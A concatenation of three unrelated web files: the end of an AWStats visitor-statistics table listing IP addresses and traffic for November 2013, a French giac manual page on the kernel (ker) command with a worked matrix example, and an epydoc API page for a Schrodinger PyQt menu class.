<tr><td class="aws">77.41.121.93</td><td>62</td><td>237</td><td>33.41 MB</td><td>26 Nov 2013 - 09:25</td></tr>
<tr><td class="aws">37.204.144.30</td><td>62</td><td>468</td><td>28.88 MB</td><td>05 Nov 2013 - 16:55</td></tr>
<tr><td class="aws">217.151.131.51</td><td>62</td><td>349</td><td>21.14 MB</td><td>27 Nov 2013 - 14:59</td></tr>
<tr><td class="aws">195.66.108.10</td><td>62</td><td>441</td><td>69.57 MB</td><td>28 Nov 2013 - 09:17</td></tr>
<tr><td class="aws">92.243.182.168</td><td>62</td><td>267</td><td>9.78 MB</td><td>24 Nov 2013 - 21:24</td></tr>
<tr><td class="aws">212.5.66.66</td><td>62</td><td>422</td><td>13.05 MB</td><td>21 Nov 2013 - 14:19</td></tr>
<tr><td class="aws">46.242.69.172</td><td>62</td><td>62</td><td>650.10 KB</td><td>30 Nov 2013 - 22:21</td></tr>
<tr><td class="aws">87.245.179.122</td><td>62</td><td>95</td><td>3.44 MB</td><td>21 Nov 2013 - 16:29</td></tr>
<tr><td class="aws">94.198.111.82</td><td>62</td><td>290</td><td>12.13 MB</td><td>27 Nov 2013 - 21:05</td></tr>
<tr><td class="aws">195.250.56.5</td><td>62</td><td>188</td><td>7.43 MB</td><td>28 Nov 2013 - 13:06</td></tr>
<tr><td class="aws">92.36.85.152</td><td>62</td><td>105</td><td>14.81 MB</td><td>07 Nov 2013 - 10:11</td></tr>
<tr><td class="aws">217.171.6.186</td><td>62</td><td>236</td><td>6.00 MB</td><td>26 Nov 2013 - 10:44</td></tr>
<tr><td class="aws">37.204.249.248</td><td>62</td><td>86</td><td>1.30 MB</td><td>21 Nov 2013 - 22:18</td></tr>
<tr><td class="aws">86.111.21.154</td><td>61</td><td>232</td><td>20.49 MB</td><td>29 Nov 2013 - 13:38</td></tr>
<tr><td class="aws">85.30.246.2</td><td>61</td><td>295</td><td>7.78 MB</td><td>21 Nov 2013 - 13:23</td></tr>
<tr><td class="aws">176.124.188.147</td><td>61</td><td>228</td><td>20.26 MB</td><td>20 Nov 2013 - 09:48</td></tr>
<tr><td class="aws">128.68.152.62</td><td>61</td><td>307</td><td>12.02 MB</td><td>07 Nov 2013 - 11:54</td></tr>
<tr><td class="aws">77.94.189.203</td><td>61</td><td>61</td><td>608.79 KB</td><td>30 Nov 2013 - 21:36</td></tr>
<tr><td class="aws">89.208.228.46</td><td>61</td><td>494</td><td>6.86 MB</td><td>18 Nov 2013 - 21:57</td></tr>
<tr><td class="aws">95.143.123.101</td><td>61</td><td>234</td><td>23.06 MB</td><td>29 Nov 2013 - 11:19</td></tr>
<tr><td class="aws">91.217.102.73</td><td>61</td><td>314</td><td>12.59 MB</td><td>28 Nov 2013 - 09:06</td></tr>
<tr><td class="aws">178.215.97.208</td><td>61</td><td>221</td><td>18.84 MB</td><td>30 Nov 2013 - 23:35</td></tr>
<tr><td class="aws">95.24.243.196</td><td>61</td><td>363</td><td>5.98 MB</td><td>07 Nov 2013 - 18:16</td></tr>
<tr><td class="aws">212.109.6.240</td><td>61</td><td>61</td><td>241.47 KB</td><td>27 Nov 2013 - 19:31</td></tr>
<tr><td class="aws">46.39.35.172</td><td>61</td><td>86</td><td>1.33 MB</td><td>30 Nov 2013 - 22:04</td></tr>
<tr><td class="aws">79.165.247.198</td><td>61</td><td>167</td><td>20.39 MB</td><td>29 Nov 2013 - 06:25</td></tr>
<tr><td class="aws">94.253.44.203</td><td>61</td><td>402</td><td>6.44 MB</td><td>24 Nov 2013 - 23:09</td></tr>
<tr><td class="aws">109.188.126.70</td><td>61</td><td>327</td><td>10.62 MB</td><td>30 Nov 2013 - 08:20</td></tr>
<tr><td class="aws">84.18.112.252</td><td>61</td><td>71</td><td>932.75 KB</td><td>30 Nov 2013 - 14:36</td></tr>
<tr><td class="aws">83.149.9.180</td><td>61</td><td>352</td><td>24.74 MB</td><td>27 Nov 2013 - 22:20</td></tr>
<tr><td class="aws">94.29.31.40</td><td>61</td><td>176</td><td>15.95 MB</td><td>12 Nov 2013 - 16:46</td></tr>
<tr><td class="aws">84.253.69.226</td><td>61</td><td>277</td><td>33.05 MB</td><td>26 Nov 2013 - 12:15</td></tr>
<tr><td class="aws">83.237.226.62</td><td>61</td><td>126</td><td>3.65 MB</td><td>12 Nov 2013 - 18:40</td></tr>
<tr><td class="aws">194.186.253.78</td><td>61</td><td>113</td><td>2.72 MB</td><td>23 Nov 2013 - 16:54</td></tr>
<tr><td class="aws">83.149.9.212</td><td>61</td><td>364</td><td>34.07 MB</td><td>26 Nov 2013 - 20:47</td></tr>
<tr><td class="aws">37.190.53.41</td><td>61</td><td>142</td><td>8.14 MB</td><td>29 Nov 2013 - 09:00</td></tr>
<tr><td class="aws">46.188.4.3</td><td>60</td><td>498</td><td>31.52 MB</td><td>28 Nov 2013 - 16:40</td></tr>
<tr><td class="aws">188.123.230.132</td><td>60</td><td>271</td><td>64.49 MB</td><td>30 Nov 2013 - 21:28</td></tr>
<tr><td class="aws">212.83.11.236</td><td>60</td><td>563</td><td>15.24 MB</td><td>29 Nov 2013 - 15:06</td></tr>
<tr><td class="aws">178.137.165.249</td><td>60</td><td>60</td><td>2.52 MB</td><td>15 Nov 2013 - 05:34</td></tr>
<tr><td class="aws">213.33.168.122</td><td>60</td><td>251</td><td>2.82 MB</td><td>26 Nov 2013 - 11:53</td></tr>
<tr><td class="aws">95.84.224.228</td><td>60</td><td>60</td><td>655.50 KB</td><td>30 Nov 2013 - 19:19</td></tr>
<tr><td class="aws">83.149.8.108</td><td>60</td><td>257</td><td>16.93 MB</td><td>29 Nov 2013 - 19:30</td></tr>
<tr><td class="aws">83.149.8.173</td><td>60</td><td>340</td><td>22.94 MB</td><td>29 Nov 2013 - 12:21</td></tr>
<tr><td class="aws">91.194.184.10</td><td>60</td><td>351</td><td>35.34 MB</td><td>28 Nov 2013 - 17:12</td></tr>
<tr><td class="aws">82.138.62.155</td><td>60</td><td>280</td><td>5.53 MB</td><td>29 Nov 2013 - 13:19</td></tr>
<tr><td class="aws">213.79.98.22</td><td>60</td><td>87</td><td>1.40 MB</td><td>29 Nov 2013 - 14:23</td></tr>
<tr><td class="aws">94.143.42.59</td><td>60</td><td>157</td><td>4.81 MB</td><td>16 Nov 2013 - 16:53</td></tr>
<tr><td class="aws">213.247.155.182</td><td>60</td><td>170</td><td>19.64 MB</td><td>29 Nov 2013 - 12:46</td></tr>
<tr><td class="aws">83.149.8.148</td><td>60</td><td>346</td><td>10.73 MB</td><td>30 Nov 2013 - 07:21</td></tr>
<tr><td class="aws">95.84.130.251</td><td>60</td><td>88</td><td>1.82 MB</td><td>16 Nov 2013 - 19:55</td></tr>
<tr><td class="aws">37.146.153.111</td><td>60</td><td>181</td><td>6.89 MB</td><td>11 Nov 2013 - 08:30</td></tr>
<tr><td class="aws">46.39.228.0</td><td>60</td><td>295</td><td>72.46 MB</td><td>30 Nov 2013 - 21:33</td></tr>
<tr><td class="aws">80.251.112.200</td><td>60</td><td>166</td><td>5.62 MB</td><td>30 Nov 2013 - 21:33</td></tr>
<tr><td class="aws">78.158.206.32</td><td>60</td><td>98</td><td>3.65 MB</td><td>29 Nov 2013 - 18:30</td></tr>
<tr><td class="aws">195.16.55.211</td><td>60</td><td>205</td><td>17.30 MB</td><td>27 Nov 2013 - 13:04</td></tr>
<tr><td class="aws">5.228.156.238</td><td>60</td><td>158</td><td>23.99 MB</td><td>06 Nov 2013 - 18:35</td></tr>
<tr><td class="aws">79.135.234.62</td><td>60</td><td>359</td><td>24.85 MB</td><td>26 Nov 2013 - 17:32</td></tr>
<tr><td class="aws">83.149.8.203</td><td>60</td><td>287</td><td>19.31 MB</td><td>21 Nov 2013 - 10:50</td></tr>
<tr><td class="aws">37.190.51.55</td><td>60</td><td>547</td><td>37.15 MB</td><td>13 Nov 2013 - 18:56</td></tr>
<tr><td class="aws">194.33.79.1</td><td>60</td><td>521</td><td>12.05 MB</td><td>29 Nov 2013 - 12:26</td></tr>
<tr><td class="aws">91.209.72.192</td><td>60</td><td>187</td><td>2.92 MB</td><td>29 Nov 2013 - 13:23</td></tr>
<tr><td class="aws">212.46.12.243</td><td>60</td><td>168</td><td>10.25 MB</td><td>28 Nov 2013 - 07:42</td></tr>
<tr><td class="aws">86.62.104.97</td><td>60</td><td>196</td><td>23.71 MB</td><td>18 Nov 2013 - 23:38</td></tr>
<tr><td class="aws">79.139.221.77</td><td>60</td><td>190</td><td>5.43 MB</td><td>04 Nov 2013 - 12:20</td></tr>
<tr><td class="aws">90.155.163.195</td><td>60</td><td>461</td><td>17.53 MB</td><td>30 Nov 2013 - 08:28</td></tr>
<tr><td class="aws">79.139.213.230</td><td>60</td><td>213</td><td>12.22 MB</td><td>22 Nov 2013 - 04:09</td></tr>
<tr><td class="aws">91.207.7.209</td><td>59</td><td>59</td><td>2.50 MB</td><td>30 Nov 2013 - 08:08</td></tr>
<tr><td class="aws">128.69.231.199</td><td>59</td><td>127</td><td>10.25 MB</td><td>30 Nov 2013 - 16:39</td></tr>
<tr><td class="aws">193.233.4.2</td><td>59</td><td>300</td><td>13.99 MB</td><td>25 Nov 2013 - 09:22</td></tr>
<tr><td class="aws">213.87.137.73</td><td>59</td><td>240</td><td>8.48 MB</td><td>22 Nov 2013 - 16:20</td></tr>
<tr><td class="aws">89.23.193.17</td><td>59</td><td>84</td><td>1.69 MB</td><td>20 Nov 2013 - 21:08</td></tr>
<tr><td class="aws">193.232.225.6</td><td>59</td><td>130</td><td>4.85 MB</td><td>22 Nov 2013 - 11:47</td></tr>
<tr><td class="aws">37.204.97.198</td><td>59</td><td>170</td><td>8.51 MB</td><td>10 Nov 2013 - 09:20</td></tr>
<tr><td class="aws">37.190.63.25</td><td>59</td><td>196</td><td>11.58 MB</td><td>07 Nov 2013 - 15:21</td></tr>
<tr><td class="aws">81.26.147.34</td><td>59</td><td>319</td><td>19.89 MB</td><td>12 Nov 2013 - 16:44</td></tr>
<tr><td class="aws">83.149.9.137</td><td>59</td><td>294</td><td>14.47 MB</td><td>27 Nov 2013 - 15:25</td></tr>
<tr><td class="aws">91.223.34.195</td><td>59</td><td>449</td><td>16.50 MB</td><td>25 Nov 2013 - 12:23</td></tr>
<tr><td class="aws">46.39.46.101</td><td>59</td><td>195</td><td>5.82 MB</td><td>21 Nov 2013 - 15:41</td></tr>
<tr><td class="aws">46.188.16.8</td><td>59</td><td>168</td><td>17.79 MB</td><td>26 Nov 2013 - 10:37</td></tr>
<tr><td class="aws">77.243.99.211</td><td>59</td><td>177</td><td>25.99 MB</td><td>14 Nov 2013 - 19:33</td></tr>
<tr><td class="aws">109.72.73.11</td><td>59</td><td>298</td><td>39.64 MB</td><td>29 Nov 2013 - 01:01</td></tr>
<tr><td class="aws">95.220.132.246</td><td>59</td><td>132</td><td>14.46 MB</td><td>05 Nov 2013 - 22:06</td></tr>
<tr><td class="aws">91.78.204.87</td><td>59</td><td>282</td><td>71.20 MB</td><td>22 Nov 2013 - 11:18</td></tr>
<tr><td class="aws">83.149.8.27</td><td>59</td><td>240</td><td>6.31 MB</td><td>23 Nov 2013 - 18:15</td></tr>
<tr><td class="aws">188.123.231.68</td><td>59</td><td>223</td><td>8.87 MB</td><td>28 Nov 2013 - 21:42</td></tr>
<tr><td class="aws">83.149.9.61</td><td>59</td><td>265</td><td>11.11 MB</td><td>29 Nov 2013 - 16:49</td></tr>
<tr><td class="aws">95.143.213.189</td><td>59</td><td>175</td><td>6.93 MB</td><td>18 Nov 2013 - 11:18</td></tr>
<tr><td class="aws">95.73.148.17</td><td>59</td><td>105</td><td>4.92 MB</td><td>17 Nov 2013 - 22:32</td></tr>
<tr><td class="aws">77.35.233.245</td><td>59</td><td>121</td><td>15.92 MB</td><td>01 Nov 2013 - 16:09</td></tr>
<tr><td class="aws">141.136.119.202</td><td>58</td><td>242</td><td>12.69 MB</td><td>15 Nov 2013 - 11:12</td></tr>
<tr><td class="aws">85.192.59.222</td><td>58</td><td>58</td><td>767.51 KB</td><td>28 Nov 2013 - 14:59</td></tr>
<tr><td class="aws">94.29.127.73</td><td>58</td><td>190</td><td>3.15 MB</td><td>29 Nov 2013 - 12:31</td></tr>
<tr><td class="aws">176.221.12.130</td><td>58</td><td>58</td><td>608.41 KB</td><td>29 Nov 2013 - 13:22</td></tr>
<tr><td class="aws">87.245.128.89</td><td>58</td><td>58</td><td>757.15 KB</td><td>29 Nov 2013 - 14:04</td></tr>
<tr><td class="aws">89.222.181.66</td><td>58</td><td>58</td><td>808.16 KB</td><td>30 Nov 2013 - 19:39</td></tr>
<tr><td class="aws">195.19.58.23</td><td>58</td><td>58</td><td>595.19 KB</td><td>30 Nov 2013 - 17:33</td></tr>
<tr><td class="aws">217.151.131.12</td><td>58</td><td>373</td><td>21.63 MB</td><td>20 Nov 2013 - 11:52</td></tr>
<tr><td class="aws">178.219.32.79</td><td>58</td><td>353</td><td>5.00 MB</td><td>25 Nov 2013 - 13:07</td></tr>
<tr><td class="aws">213.134.216.66</td><td>58</td><td>150</td><td>8.00 MB</td><td>25 Nov 2013 - 12:08</td></tr>
<tr><td class="aws">62.118.178.122</td><td>58</td><td>87</td><td>1.44 MB</td><td>30 Nov 2013 - 19:18</td></tr>
<tr><td class="aws">109.188.124.61</td><td>58</td><td>309</td><td>14.41 MB</td><td>29 Nov 2013 - 08:13</td></tr>
<tr><td class="aws">81.195.208.66</td><td>58</td><td>899</td><td>22.98 MB</td><td>29 Nov 2013 - 11:52</td></tr>
<tr><td class="aws">80.247.35.62</td><td>58</td><td>194</td><td>8.70 MB</td><td>08 Nov 2013 - 13:36</td></tr>
<tr><td class="aws">95.72.215.110</td><td>58</td><td>114</td><td>835.73 KB</td><td>18 Nov 2013 - 18:56</td></tr>
<tr><td class="aws">31.41.216.117</td><td>58</td><td>58</td><td>2.40 MB</td><td>28 Nov 2013 - 09:30</td></tr>
<tr><td class="aws">109.207.163.78</td><td>58</td><td>118</td><td>13.57 MB</td><td>18 Nov 2013 - 23:21</td></tr>
<tr><td class="aws">92.243.181.75</td><td>58</td><td>214</td><td>15.85 MB</td><td>26 Nov 2013 - 14:14</td></tr>
<tr><td class="aws">217.67.182.146</td><td>58</td><td>134</td><td>5.96 MB</td><td>07 Nov 2013 - 15:33</td></tr>
<tr><td class="aws">212.41.32.103</td><td>58</td><td>345</td><td>11.85 MB</td><td>28 Nov 2013 - 11:45</td></tr>
<tr><td class="aws">188.235.105.113</td><td>58</td><td>58</td><td>738.42 KB</td><td>29 Nov 2013 - 10:57</td></tr>
<tr><td class="aws">128.68.76.45</td><td>58</td><td>168</td><td>6.05 MB</td><td>19 Nov 2013 - 14:52</td></tr>
<tr><td class="aws">93.157.175.168</td><td>58</td><td>166</td><td>30.13 MB</td><td>29 Nov 2013 - 15:04</td></tr>
<tr><td class="aws">5.228.60.13</td><td>58</td><td>323</td><td>27.06 MB</td><td>29 Nov 2013 - 11:15</td></tr>
<tr><td class="aws">77.37.229.197</td><td>57</td><td>102</td><td>6.91 MB</td><td>27 Nov 2013 - 18:07</td></tr>
<tr><td class="aws">94.198.111.90</td><td>57</td><td>287</td><td>17.40 MB</td><td>30 Nov 2013 - 00:20</td></tr>
<tr><td class="aws">89.175.166.102</td><td>57</td><td>231</td><td>4.61 MB</td><td>28 Nov 2013 - 08:30</td></tr>
<tr><td class="aws">82.204.185.34</td><td>57</td><td>57</td><td>623.87 KB</td><td>29 Nov 2013 - 15:42</td></tr>
<tr><td class="aws">94.158.161.2</td><td>57</td><td>57</td><td>580.88 KB</td><td>30 Nov 2013 - 22:52</td></tr>
<tr><td class="aws">83.149.9.189</td><td>57</td><td>307</td><td>16.99 MB</td><td>26 Nov 2013 - 11:22</td></tr>
<tr><td class="aws">188.123.232.166</td><td>57</td><td>189</td><td>27.99 MB</td><td>21 Nov 2013 - 22:03</td></tr>
<tr><td class="aws"><span style="color: #666688">Known</span></td><td>414616</td><td>2537987</td><td>127.11 GB</td><td> </td></tr>
</table></td></tr></table><br />
<br /><br />
<span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 6.95 (build 1.943)</b> - <a href="http://awstats.sourceforge.net" target="awstatshome">Created by awstats</a></span><br />
<br />
</body>
</html>
|
giac/giac-1.5.0/doc/fr/cascmd_fr/cascmd_fr623.html | hiplayer/giac | <!DOCTYPE html>
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="generator" content="hevea 2.29+5 of 2017-05-18">
<link rel="stylesheet" type="text/css" href="cascmd_fr.css">
<title>Noyau d’une application linéaire : kernel nullspace ker</title>
</head>
<body >
<a href="cascmd_fr622.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_fr624.html"><img src="next_motif.gif" alt="Next"></a>
<hr>
<h3 id="sec763" class="subsection">6.53.12 Noyau d’une application linéaire : <span style="font-family:monospace">kernel nullspace ker</span></h3>
<p><a id="hevea_default1158"></a><a id="hevea_default1159"></a><a id="hevea_default1160"></a>
<span style="font-family:monospace">ker</span> (ou <span style="font-family:monospace">kernel</span> ou <span style="font-family:monospace">nullspace</span>) a comme argument la matrice d’une
application linéaire <span style="font-style:italic">f</span> dans la base canonique.<br>
<span style="font-family:monospace">ker</span> (ou <span style="font-family:monospace">kernel</span> ou <span style="font-family:monospace">nullspace</span>) renvoie une liste de vecteurs
formant une base du noyau de <span style="font-style:italic">f</span>.<br>
On tape :
</p><div class="center"><span style="font-family:monospace">ker([[1,1,2],[2,1,3],[3,1,4]])</span></div><p>
On obtient :
</p><div class="center"><span style="font-family:monospace">[[1,1,-1]]</span></div><p>
Le noyau est donc engendré par le vecteur <span style="font-family:monospace">[1,1,-1]</span>.
</p>
<hr>
<a href="cascmd_fr622.html"><img src="previous_motif.gif" alt="Previous"></a>
<a href="index.html"><img src="contents_motif.gif" alt="Up"></a>
<a href="cascmd_fr624.html"><img src="next_motif.gif" alt="Next"></a>
</body>
</html>
|
Schrodinger/Schrodinger_2015-2_docs/python_api/api/schrodinger.application.bioluminate.pml_menus.ExcludeFromSelection-class.html | platinhom/ManualHom | <?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>schrodinger.application.bioluminate.pml_menus.ExcludeFromSelection</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
<!-- Index link -->
<th> <a
href="identifier-index.html">Indices</a> </th>
<!-- Help link -->
<th> <a
href="help.html">Help</a> </th>
<!-- Project homepage -->
<th class="navbar" align="right" width="100%">
<table border="0" cellpadding="0" cellspacing="0">
<tr><th class="navbar" align="center"
>2015-2Schrodinger Python API</th>
</tr></table></th>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0">
<tr valign="top">
<td width="100%">
<span class="breadcrumbs">
<a href="schrodinger-module.html">Package schrodinger</a> ::
<a href="schrodinger.application-module.html">Package application</a> ::
<a href="schrodinger.application.bioluminate-module.html">Package bioluminate</a> ::
<a href="schrodinger.application.bioluminate.pml_menus-module.html">Module pml_menus</a> ::
Class ExcludeFromSelection
</span>
</td>
<td>
<table cellpadding="0" cellspacing="0">
<!-- hide/show private -->
<tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink"
onclick="toggle_private();">hide private</a>]</span></td></tr>
<tr><td align="right"><span class="options"
>[<a href="frames.html" target="_top">frames</a
>] | <a href="schrodinger.application.bioluminate.pml_menus.ExcludeFromSelection-class.html"
target="_top">no frames</a>]</span></td></tr>
</table>
</td>
</tr>
</table>
<!-- ==================== CLASS DESCRIPTION ==================== -->
<h1 class="epydoc">Class ExcludeFromSelection</h1><p class="nomargin-top"></p>
<pre class="base-tree">
<a href="object-class.html">object</a> --+
|
sip.simplewrapper --+
|
sip.wrapper --+
|
PyQt4.QtCore.QObject --+
|
PyQt4.QtGui.QAction --+
|
<a href="schrodinger.application.bioluminate.pml_menus.MAction-class.html">MAction</a> --+
|
<a href="schrodinger.application.bioluminate.pml_menus.RestrictSelection-class.html">RestrictSelection</a> --+
|
<strong class="uidshort">ExcludeFromSelection</strong>
</pre>
<hr />
<!-- ==================== NESTED CLASSES ==================== -->
<a name="section-NestedClasses"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Nested Classes</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-NestedClasses"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code>PyQt4.QtGui.QAction</code></b>:
<code><a href="PyQt4.QtGui.QAction.ActionEvent-class.html">ActionEvent</a></code>,
<code><a href="PyQt4.QtGui.QAction.MenuRole-class.html">MenuRole</a></code>,
<code><a href="PyQt4.QtGui.QAction.Priority-class.html">Priority</a></code>,
<code><a href="PyQt4.QtGui.QAction.SoftKeyRole-class.html">SoftKeyRole</a></code>
</p>
</td>
</tr>
</table>
<!-- ==================== INSTANCE METHODS ==================== -->
<a name="section-InstanceMethods"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Instance Methods</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-InstanceMethods"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td width="15%" align="right" valign="top" class="summary">
<span class="summary-type"> </span>
</td><td class="summary">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr>
<td><span class="summary-sig"><a href="schrodinger.application.bioluminate.pml_menus.ExcludeFromSelection-class.html#command" class="summary-sig-name">command</a>(<span class="summary-sig-arg">self</span>)</span><br />
Exclude a specific object from the selection</td>
<td align="right" valign="top">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code><a href="schrodinger.application.bioluminate.pml_menus.RestrictSelection-class.html">RestrictSelection</a></code></b>:
<code><a href="schrodinger.application.bioluminate.pml_menus.RestrictSelection-class.html#__init__">__init__</a></code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>PyQt4.QtGui.QAction</code></b>:
<code>actionGroup</code>,
<code>activate</code>,
<code>associatedGraphicsWidgets</code>,
<code>associatedWidgets</code>,
<code>autoRepeat</code>,
<code>changed</code>,
<code>data</code>,
<code>event</code>,
<code>font</code>,
<code>hover</code>,
<code>hovered</code>,
<code>icon</code>,
<code>iconText</code>,
<code>isCheckable</code>,
<code>isChecked</code>,
<code>isEnabled</code>,
<code>isIconVisibleInMenu</code>,
<code>isSeparator</code>,
<code>isVisible</code>,
<code>menu</code>,
<code>menuRole</code>,
<code>parentWidget</code>,
<code>priority</code>,
<code>setActionGroup</code>,
<code>setAutoRepeat</code>,
<code>setCheckable</code>,
<code>setChecked</code>,
<code>setData</code>,
<code>setDisabled</code>,
<code>setEnabled</code>,
<code>setFont</code>,
<code>setIcon</code>,
<code>setIconText</code>,
<code>setIconVisibleInMenu</code>,
<code>setMenu</code>,
<code>setMenuRole</code>,
<code>setPriority</code>,
<code>setSeparator</code>,
<code>setShortcut</code>,
<code>setShortcutContext</code>,
<code>setShortcuts</code>,
<code>setSoftKeyRole</code>,
<code>setStatusTip</code>,
<code>setText</code>,
<code>setToolTip</code>,
<code>setVisible</code>,
<code>setWhatsThis</code>,
<code>shortcut</code>,
<code>shortcutContext</code>,
<code>shortcuts</code>,
<code>showStatusText</code>,
<code>softKeyRole</code>,
<code>statusTip</code>,
<code>text</code>,
<code>toggle</code>,
<code>toggled</code>,
<code>toolTip</code>,
<code>trigger</code>,
<code>triggered</code>,
<code>whatsThis</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>PyQt4.QtCore.QObject</code></b>:
<code>__getattr__</code>,
<code>blockSignals</code>,
<code>childEvent</code>,
<code>children</code>,
<code>connect</code>,
<code>connectNotify</code>,
<code>customEvent</code>,
<code>deleteLater</code>,
<code>destroyed</code>,
<code>disconnect</code>,
<code>disconnectNotify</code>,
<code>dumpObjectInfo</code>,
<code>dumpObjectTree</code>,
<code>dynamicPropertyNames</code>,
<code>emit</code>,
<code>eventFilter</code>,
<code>findChild</code>,
<code>findChildren</code>,
<code>inherits</code>,
<code>installEventFilter</code>,
<code>isWidgetType</code>,
<code>killTimer</code>,
<code>metaObject</code>,
<code>moveToThread</code>,
<code>objectName</code>,
<code>parent</code>,
<code>property</code>,
<code>pyqtConfigure</code>,
<code>receivers</code>,
<code>removeEventFilter</code>,
<code>sender</code>,
<code>senderSignalIndex</code>,
<code>setObjectName</code>,
<code>setParent</code>,
<code>setProperty</code>,
<code>signalsBlocked</code>,
<code>startTimer</code>,
<code>thread</code>,
<code>timerEvent</code>,
<code>tr</code>,
<code>trUtf8</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>sip.simplewrapper</code></b>:
<code>__new__</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>:
<code><a href="object-class.html#__delattr__">__delattr__</a></code>,
<code><a href="object-class.html#__format__">__format__</a></code>,
<code><a href="object-class.html#__getattribute__">__getattribute__</a></code>,
<code><a href="object-class.html#__hash__">__hash__</a></code>,
<code><a href="object-class.html#__reduce__">__reduce__</a></code>,
<code><a href="object-class.html#__reduce_ex__">__reduce_ex__</a></code>,
<code><a href="object-class.html#__repr__">__repr__</a></code>,
<code><a href="object-class.html#__setattr__">__setattr__</a></code>,
<code><a href="object-class.html#__sizeof__">__sizeof__</a></code>,
<code><a href="object-class.html#__str__">__str__</a></code>,
<code><a href="object-class.html#__subclasshook__">__subclasshook__</a></code>
</p>
</td>
</tr>
</table>
<!-- ==================== CLASS VARIABLES ==================== -->
<a name="section-ClassVariables"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Class Variables</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-ClassVariables"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code>PyQt4.QtGui.QAction</code></b>:
<code>AboutQtRole</code>,
<code>AboutRole</code>,
<code>ApplicationSpecificRole</code>,
<code>HighPriority</code>,
<code>Hover</code>,
<code>LowPriority</code>,
<code>NegativeSoftKey</code>,
<code>NoRole</code>,
<code>NoSoftKey</code>,
<code>NormalPriority</code>,
<code>PositiveSoftKey</code>,
<code>PreferencesRole</code>,
<code>QuitRole</code>,
<code>SelectSoftKey</code>,
<code>TextHeuristicRole</code>,
<code>Trigger</code>
</p>
<p class="indent-wrapped-lines"><b>Inherited from <code>PyQt4.QtCore.QObject</code></b>:
<code>staticMetaObject</code>
</p>
</td>
</tr>
</table>
<!-- ==================== PROPERTIES ==================== -->
<a name="section-Properties"></a>
<table class="summary" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Properties</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-Properties"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2" class="summary">
<p class="indent-wrapped-lines"><b>Inherited from <code><a href="object-class.html">object</a></code></b>:
<code><a href="object-class.html#__class__">__class__</a></code>
</p>
</td>
</tr>
</table>
<!-- ==================== METHOD DETAILS ==================== -->
<a name="section-MethodDetails"></a>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr bgcolor="#70b0f0" class="table-header">
<td colspan="2" class="table-header">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td align="left"><span class="table-header">Method Details</span></td>
<td align="right" valign="top"
><span class="options">[<a href="#section-MethodDetails"
class="privatelink" onclick="toggle_private();"
>hide private</a>]</span></td>
</tr>
</table>
</td>
</tr>
</table>
<a name="command"></a>
<div>
<table class="details" border="1" cellpadding="3"
cellspacing="0" width="100%" bgcolor="white">
<tr><td>
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr valign="top"><td>
<h3 class="epydoc"><span class="sig"><span class="sig-name">command</span>(<span class="sig-arg">self</span>)</span>
</h3>
</td><td align="right" valign="top"
>
</td>
</tr></table>
<p>Exclude a specific object from the selection</p>
<dl class="fields">
<dt>Overrides:
<a href="schrodinger.application.bioluminate.pml_menus.MAction-class.html#command">MAction.command</a>
</dt>
</dl>
</td></tr></table>
</div>
<br />
